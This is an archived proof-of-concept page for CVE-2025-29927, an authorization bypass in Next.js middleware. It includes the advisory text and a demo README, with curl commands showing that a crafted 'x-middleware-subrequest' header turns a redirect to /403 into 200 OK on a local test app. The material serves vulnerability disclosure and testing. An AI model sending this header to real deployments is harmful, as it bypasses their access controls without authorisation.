Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source
https://github.com/fourcube/nextjs-middleware-bypass-demo
Associated Vulnerability
Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Description
Demo for Next.js middleware bypass - CVE-2025-29927
Readme
# CVE-2025-29927 Demo

Original writeup: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

## Setup

First, run the development server:

```bash
npm i
npm run dev
```

Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.

## Trying out the bypass

`curl -I http://localhost:3000`

```http
HTTP/1.1 307 Temporary Redirect
location: /403
Date: Mon, 24 Mar 2025 08:02:50 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```

`curl -I -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000`

```http
HTTP/1.1 200 OK
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
link: </_next/static/media/569ce4b8f30dc480-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/media/93f479601ee12b01-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/css/app/layout.css?v=1742803407039>; rel=preload; as="style"
Cache-Control: no-store, must-revalidate
X-Powered-By: Next.js
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Mar 2025 08:03:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```
File Snapshot

 [4.0K]  /data/pocs/cf26b64aa90d787a4a95449422d116596e27cfb3
├── [ 393]  eslint.config.mjs
├── [1.0K]  LICENSE
├── [ 133]  next.config.ts
├── [ 568]  package.json
├── [323K]  package-lock.json
├── [  81]  postcss.config.mjs
├── [4.0K]  public
│   ├── [ 391]  file.svg
│   ├── [1.0K]  globe.svg
│   ├── [1.3K]  next.svg
│   ├── [ 128]  vercel.svg
│   └── [ 385]  window.svg
├── [1.2K]  README.md
├── [4.0K]  src
│   ├── [4.0K]  app
│   │   ├── [4.0K]  403
│   │   │   └── [ 640]  page.tsx
│   │   ├── [ 25K]  favicon.ico
│   │   ├── [ 488]  globals.css
│   │   ├── [ 689]  layout.tsx
│   │   └── [ 433]  page.tsx
│   └── [ 662]  middleware.ts
└── [ 602]  tsconfig.json

4 directories, 19 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →